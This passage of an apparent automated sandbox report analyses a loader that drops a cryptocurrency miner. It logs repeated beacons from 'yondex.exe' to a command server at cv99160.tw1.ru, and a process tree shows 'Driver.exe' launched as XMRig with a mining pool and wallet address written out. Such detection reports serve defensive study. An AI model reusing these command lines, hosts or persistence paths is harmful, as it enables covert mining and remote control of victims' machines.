                                                                              2024-06-23 09:34:40 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              133 | 192.168.2.4 | 49877 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:34:43 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:43 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:43 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=1fd1326eb7ab8cee316cb07cc7f21133; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              134 | 192.168.2.4 | 49878 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:34:44 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:44 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:44 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=2dd95ae5d63ba471b99ea578fd807716; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:44 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              135 | 192.168.2.4 | 49879 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:34:46 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:46 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:46 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=cddd5234d3acab52460d68e4e4fb4976; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              136 | 192.168.2.4 | 49880 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:34:47 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:47 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:47 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=3f411fab3e652dbd91e8a3d8a78b9df1; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:47 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              137 | 192.168.2.4 | 49881 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:34:49 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:50 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:50 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=0b150c9657f82ff7f88a16359cd7892e; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              138 | 192.168.2.4 | 49882 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:34:50 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:51 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:51 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=18449a694dc7f14830eeb24674fe7998; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:51 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              139 | 192.168.2.4 | 49883 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:34:52 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:53 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:53 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=6cf43b83120a8178702b6c9bb5750153; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              140 | 192.168.2.4 | 49884 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:34:53 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:54 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:54 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=cdebd5f4d9caed67486800f4d315d0a1; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:54 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              141 | 192.168.2.4 | 49885 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:34:56 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:56 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:56 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=559a87f68063b4059cd4f5421e2fb6d7; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              142 | 192.168.2.4 | 49886 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:34:57 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:57 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:57 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=a8a3b3574d823539aba6e00e7b49c1dc; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:57 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              143 | 192.168.2.4 | 49887 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:34:59 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:35:00 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:59 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=91cfb540205b297d0cf229fa31102014; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              144 | 192.168.2.4 | 49888 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:35:00 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:35:01 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:35:01 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=8d5308b0b5c44783a0588cf09870014f; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:35:01 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              145 | 192.168.2.4 | 49889 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:35:03 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:35:03 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:35:03 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=1f3f1a48f4dceca08c62baf8870f24cf; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              146 | 192.168.2.4 | 49890 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:35:04 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:35:04 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:35:04 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=c55db86199781635c6a56e68c1c15ba4; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:35:04 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              147 | 192.168.2.4 | 49891 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:35:07 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:35:08 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:35:07 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=ae798cd535c4d6e900f56973a6c42f22; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              148 | 192.168.2.4 | 49892 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:35:08 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:35:09 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:35:08 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=a4fc576e599799f80ac617ecf9f7c91f; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:35:09 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Target ID:0
                                                                              Start time:05:31:01
                                                                              Start date:23/06/2024
                                                                              Path:C:\Users\user\Desktop\h2UFp4aCRq.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\Desktop\h2UFp4aCRq.exe"
                                                                              Imagebase:0x7ff655920000
                                                                              File size:5'061'451 bytes
                                                                              MD5 hash:1FECBC51B5620E578C48A12EBEB19BC2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:1
                                                                              Start time:05:31:02
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "
                                                                              Imagebase:0x7ff7af880000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:05:31:02
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:3
                                                                              Start time:05:31:02
                                                                              Start date:23/06/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:rolex.exe -priverdD
                                                                              Imagebase:0x7ff7ab490000
                                                                              File size:4'605'877 bytes
                                                                              MD5 hash:8866D677A3309A0AD903F37557C5941B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_LoaderBot, Description: Yara detected LoaderBot, Source: 00000003.00000003.1726307942.000001FEAC072000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 8%, ReversingLabs
                                                                              • Detection: 14%, Virustotal
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:4
                                                                              Start time:05:31:03
                                                                              Start date:23/06/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe"
                                                                              Imagebase:0x690000
                                                                              File size:4'157'440 bytes
                                                                              MD5 hash:BD2413C32E34D0031F7881D51AE731FF
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_LoaderBot, Description: Yara detected LoaderBot, Source: 00000004.00000000.1730928897.0000000000692000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LoaderBot, Description: Yara detected LoaderBot, Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, Author: Joe Security
                                                                              • Rule: MALWARE_Win_CoinMiner04, Description: Detects coinmining malware, Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, Author: ditekSHen
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 67%, Virustotal
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:5
                                                                              Start time:05:31:10
                                                                              Start date:23/06/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                                                                              Imagebase:0x140000000
                                                                              File size:4'141'064 bytes
                                                                              MD5 hash:02569A7A91A71133D4A1023BF32AA6F4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000005.00000002.1804831542.00000000004A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                              • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmp, Author: unknown
                                                                              Antivirus matches:
                                                                              • Detection: 61%, ReversingLabs
                                                                              • Detection: 68%, Virustotal
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:6
                                                                              Start time:05:31:10
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:7
                                                                              Start time:05:31:10
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                              Imagebase:0x7ff6eef20000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:8
                                                                              Start time:05:31:10
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WerFault.exe -pss -s 436 -p 7280 -ip 7280
                                                                              Imagebase:0x7ff6563e0000
                                                                              File size:570'736 bytes
                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:9
                                                                              Start time:05:31:10
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 7280 -s 764
                                                                              Imagebase:0x7ff6563e0000
                                                                              File size:570'736 bytes
                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:10
                                                                              Start time:05:31:11
                                                                              Start date:23/06/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                                                                              Imagebase:0x140000000
                                                                              File size:4'141'064 bytes
                                                                              MD5 hash:02569A7A91A71133D4A1023BF32AA6F4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000A.00000002.2583502346.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:11
                                                                              Start time:05:31:11
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:12
                                                                              Start time:05:31:15
                                                                              Start date:23/06/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe"
                                                                              Imagebase:0x180000
                                                                              File size:4'157'440 bytes
                                                                              MD5 hash:BD2413C32E34D0031F7881D51AE731FF
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:16
                                                                              Start time:05:31:26
                                                                              Start date:23/06/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe"
                                                                              Imagebase:0x9f0000
                                                                              File size:4'157'440 bytes
                                                                              MD5 hash:BD2413C32E34D0031F7881D51AE731FF
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:17
                                                                              Start time:05:31:37
                                                                              Start date:23/06/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe"
                                                                              Imagebase:0x240000
                                                                              File size:4'157'440 bytes
                                                                              MD5 hash:BD2413C32E34D0031F7881D51AE731FF
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:19
